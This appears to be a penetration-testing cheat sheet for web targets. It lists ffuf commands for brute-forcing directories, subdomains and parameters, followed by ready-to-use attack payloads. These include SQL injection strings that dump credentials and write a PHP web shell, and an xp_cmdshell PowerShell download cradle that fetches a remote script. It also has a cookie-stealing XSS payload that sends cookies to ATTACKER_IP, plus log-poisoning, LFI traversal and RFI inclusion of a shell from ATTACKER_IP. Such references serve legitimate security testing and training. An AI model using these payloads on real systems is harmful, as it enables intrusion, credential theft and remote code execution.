Web HTTP/HTTPS (80/443)

Enumeration

Technology Detection

whatweb
wappalyzer
curl -I http://<HOST>

Directory Brute Force

#Initial Scan
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -fc 404 -t 50

#Deeper Scan
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -fc 404 -t 50

#Recursive Scan
ffuf -u http://<IP>/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -fc 404 -recursion -recursion-depth 2 -t 50

#Lists
/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt

File Brute Force

ffuf -u http://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt -e .php,.txt,.bak,.old,.zip -fc 404 -t 50

#(.asp,.aspx,.config) for IIS targets

Sub-Domain Brute Force

ffuf -u http://FUZZ.<HOST> -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 40

Virtual Host Brute Force

ffuf -u http://<IP> -w /usr/share/seclists/Discovery/Web-Content/common.txt -H 'Host: FUZZ.<HOST>' -fc 404 -fs <size> -t 40

Parameter Fuzzing

#Hidden Parameter Names
ffuf -u http://<HOST>/page.php?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 20

#Value Fuzzing
ffuf -u http://<HOST>/page.php?id=FUZZ -w /usr/share/seclists/Fuzzing/3-digits-000.txt -t 20

#POST Fuzzing
ffuf -u http://<HOST>/login -X POST -d "username=FUZZ&password=test" -w /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 20

#Lists
/usr/share/seclists/Fuzzing/4-digits-0000-9999.txt
/usr/share/seclists/Fuzzing/3-digits-000.txt
/usr/share/seclists/Usernames/top-usernames-shortlist.txt
/usr/share/seclists/Discovery/Web-Content/common.txt

SQL Injection (SQLI)

Curl

curl "http://target/item.php?id=1<PAYLOAD>"

//Example Time-Based
curl "http://target/item.php?id=1' OR SLEEP(5)-- -"

Basic Injections

#Detection
'
"
`

#Boolean-Based Injection
' OR 1=1--
' OR 1=2--
' OR '1'='1'--
' OR '1'='2'--

' AND 1=1--
' AND 1=2--

#Logic Bypass
admin'--
admin'#
admin' OR '1'='1'--
' OR 1=1--

#Different Databases
--  (a trailing space is often required)
-- -
#
/*

Union Injections

//Order By → find column count
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--

//Column reflection → find which column prints
' UNION SELECT 1,2,3--

//Null method → match column count
' UNION SELECT NULL,NULL,NULL--

//Credential / Table dump
' UNION SELECT username,password,NULL FROM users--
' UNION SELECT table_name,NULL,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

//File Read
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL,NULL--

//File Write
' UNION SELECT "<?php system($_GET['cmd']); ?>",NULL,NULL INTO OUTFILE '/var/www/html/shell.php'--

Time Based Injection

#MySQL
' OR SLEEP(5)-- -

#Conditional
' AND IF(1=1,SLEEP(5),0)-- -

#MSSQL
'; WAITFOR DELAY '0:0:5'--

#PostgreSQL
'; SELECT pg_sleep(5)--

Enumeration Injection

//List Database Version
' UNION SELECT @@version,NULL,NULL--

//DB Name
' UNION SELECT database(),NULL,NULL--

//List Tables
' UNION SELECT schema_name,NULL,NULL FROM information_schema.schemata--

//List Columns
' UNION SELECT column_name,NULL,NULL FROM information_schema.columns WHERE table_name='users'--

//Dump
' UNION SELECT username,password,NULL FROM users--

Command Execution Injection

'; EXEC sp_configure 'xp_cmdshell',1--

';exec xp_cmdshell 'powershell -e JABjAGwAaQBlA...

'; EXEC xp_cmdshell 'whoami'--

'; EXEC xp_cmdshell 'powershell -c "IEX(New-Object Net.WebClient).DownloadString('http://IP/shell.ps1')"--

Command Injection

;id
|id
`id`
$(id)

Cross Site Scripting (XSS)

#Reflected - Payload in URL
#Stored - Executes whenever a user loads the page
//Examples: forum posts, comment sections, profile bios (input saved in the database)
#DOM - client-side JavaScript processes the input

# Testing XSS in URL parameters
http://target/search?q=<script>alert(1)</script>

#Testing XSS in forms
//comments, contact forms, profile fields
Submit: <script>alert(1)</script>
#Common test payloads
<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
"><script>alert(1)</script>
javascript:alert(1)

Cookie Stealing

nc -lvnp 80
<script>fetch('http://ATTACKER_IP/?c='+document.cookie)</script>

Local File Inclusion (LFI)

#Basic Traversal
../../../../etc/passwd
../../../../windows/win.ini

#Basic Bypass
....//....//....//....//etc/passwd

#Encoded Traversal
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252fetc%252fpasswd

#PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
php://filter/read=convert.base64-encode/resource=config

#Log Poisoning
curl -A "<?php system($_GET['cmd']); ?>" http://target/

#Include Log
/var/log/apache2/access.log

#Session Files
/var/lib/php/sessions/sess_<ID>

#RFI
http://target/page.php?file=http://ATTACKER_IP/shell.txt